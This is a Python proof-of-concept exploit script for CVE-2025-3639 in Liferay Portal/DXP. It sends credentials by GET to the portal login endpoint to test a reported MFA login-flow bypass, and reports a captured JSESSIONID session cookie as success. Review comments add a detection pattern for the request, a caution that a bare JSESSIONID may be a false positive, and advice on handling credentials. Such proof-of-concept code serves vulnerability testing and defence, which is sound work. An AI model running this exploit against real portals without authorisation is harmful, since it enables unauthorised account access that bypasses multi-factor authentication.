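import argparse

import requests

# Upper bound, in seconds, on how long the check waits for the portal.
# requests has no default timeout, so without this an unresponsive host
# would block the script indefinitely.
REQUEST_TIMEOUT = 10

# Cap on how much of an unexpected response body is echoed to the console.
MAX_BODY_PREVIEW = 200


def exploit(target, username, password):
    """Check whether *target* hands out a session for a GET-based login.

    Sends ``login`` and ``password`` (plus an empty ``p_auth``) as query
    parameters in a GET request to ``<target>/c/portal/login``, follows
    redirects, and reports success when the final response is HTTP 200 and
    carries a ``JSESSIONID`` cookie.

    NOTE(review): CVE-2025-3639 is reported as a login-flow bypass reached by
    switching the login request to GET on sites with MFA enabled; confirm the
    affected versions and conditions against the vendor advisory.

    Args:
        target: Base URL of the Liferay instance, e.g. ``http://example.com``.
        username: Value sent as the ``login`` parameter.
        password: Value sent as the ``password`` parameter.

    Returns:
        True when the 200 + ``JSESSIONID`` condition holds, False on any
        other response or on a request error.
    """
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")

    # Strip a trailing slash so "http://host/" does not produce "//c/portal/login".
    login_url = f"{target.rstrip('/')}/c/portal/login"

    # The credentials travel in the query string, so they are recorded in web
    # server, proxy and WAF access logs. For detection, a GET to
    # /c/portal/login carrying login/password parameters is the pattern to
    # alert on.
    params = {
        "p_auth": "",
        "login": username,
        "password": password,
    }

    try:
        response = requests.get(
            login_url,
            params=params,
            allow_redirects=True,
            timeout=REQUEST_TIMEOUT,
        )
        got_session = (
            response.status_code == 200 and "JSESSIONID" in response.cookies
        )
        # Reading the cookie can raise CookieConflictError when the jar holds
        # several cookies with this name, so it stays inside the try block.
        token = response.cookies["JSESSIONID"] if got_session else ""
    except (requests.RequestException, requests.cookies.CookieConflictError) as e:
        print(f"[-] Error: {e}")
        return False

    if got_session:
        # NOTE(review): a JSESSIONID cookie alone is weak evidence. Servlet
        # containers commonly issue one to anonymous visitors as well, so a
        # True result here can be a false positive. Confirm the session is
        # authenticated before recording the host as vulnerable or treating
        # a patch as ineffective.
        # Only a short prefix is printed: the full value is a live credential
        # and should not land in terminal scrollback or captured logs.
        print(f"[+] Success! Session token: {token[:4]}... (truncated)")
        return True

    # The body is attacker-influenced HTML of arbitrary size; show a preview only.
    preview = response.text[:MAX_BODY_PREVIEW]
    print(f"[-] Failed: {response.status_code} - {preview}")
    return False


def main():
    """Parse the command-line arguments and run the check once."""
    parser = argparse.ArgumentParser(
        description="CVE-2025-3639 PoC for Liferay Portal/DXP"
    )
    parser.add_argument(
        "--target",
        required=True,
        help="Target Liferay URL (e.g., http://example.com)",
    )
    parser.add_argument("--username", required=True, help="Valid username")
    # NOTE(review): a password passed as an argument is visible in the process
    # list and shell history; prefer a throwaway test account for this check.
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    exploit(args.target, args.username, args.password)


if __name__ == "__main__":
    main()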